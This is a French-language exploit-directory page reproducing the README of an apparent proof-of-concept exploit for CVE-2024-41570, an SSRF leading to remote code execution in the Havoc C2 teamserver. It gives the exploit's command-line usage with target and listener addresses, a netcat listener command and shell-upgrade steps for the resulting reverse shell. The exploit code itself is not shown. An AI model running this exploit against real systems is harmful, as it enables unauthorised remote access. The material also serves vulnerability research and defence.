Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-41570 — Exploit automatisé de reverse shell via WebSocket | Havoc-C2-SSRF avec RCE | Kitploit
Outils/GitHubGitHub/diemoeve/cve-2024-41570
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à Distance
GitHubdiemoeve/cve-2024-41570

CVE-2024-41570

Exploit automatisé de reverse shell via WebSocket | Havoc-C2-SSRF avec RCE

Voir le dépôt
12218il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-41570 | SSRF Havoc C2 avec RCE | Exploit automatisé de reverse shell via WebSocket

Ce projet fournit un script de preuve de concept (PoC) en Python pour exploiter un service WebSocket vulnérable. Le script automatise l'enregistrement d'un agent, la livraison de la charge utile WebSocket et l'exécution de commandes à distance pour établir un reverse shell.

Fonctionnalités

  • Enregistre un agent sur le service cible.
  • Ouvre un WebSocket et envoie les charges utiles de handshake et d'authentification.
  • Exécute des commandes à distance via un reverse shell.
  • Fournit un flux de travail guidé avec des instructions claires.

Prérequis

  • Python 3.x installé sur votre machine.
  • Installez les dépendances requises en exécutant :
    pip install -r requirements.txt
    

Installation

  1. Clonez ce dépôt :
    git clone https://github.com/kit4py/CVE-2024-41570.git
    
  2. Accédez au répertoire du projet :
    cd CVE-2024-41570
    
  3. Installez les dépendances :
    pip install -r requirements.txt
    

Utilisation

Exécutez le script avec les arguments requis :

python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>

Arguments

  • -t : URL cible du serveur WebSocket.
  • -i : Adresse IP du Team Server de Havoc.
  • -p : Port du Team Server de Havoc.
  • -U : Nom d'utilisateur pour l'authentification WebSocket.
  • -P : Mot de passe pour l'authentification WebSocket.
  • -l : IP du listener pour le reverse shell (votre machine).
  • -L : Port du listener pour le reverse shell (votre machine).

Exemple de commande

python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444

Étapes d'exécution

  1. Assurez-vous que le service cible est en cours d'exécution et vulnérable.
  2. Exécutez le script avec les paramètres requis.
  3. Dans un terminal séparé, démarrez un listener :
    nc -lvnp <listener_port>
    
  4. Améliorez le shell :
    python -c 'import pty; pty.spawn("/bin/bash")' 
    export TERM=xterm-256color
    stty rows 67 columns 318
    

Dépendances

Le script nécessite les bibliothèques Python suivantes :

  • requests
  • pycryptodome

Installez-les en utilisant la commande :

pip install -r requirements.txt

Avis de sécurité

Ce script est destiné uniquement à des fins éducatives. Assurez-vous d'avoir une autorisation explicite pour tester le système cible. Une mauvaise utilisation de ce script peut violer les lois et les directives éthiques.

Références

Inspiré par Default Havoc Poc

Contribution

Les contributions sont les bienvenues ! N'hésitez pas à forker le dépôt et à soumettre une pull request.

Licence

Ce projet est sous licence MIT. Voir le fichier LICENSE pour plus de détails.

Télécharger l’outil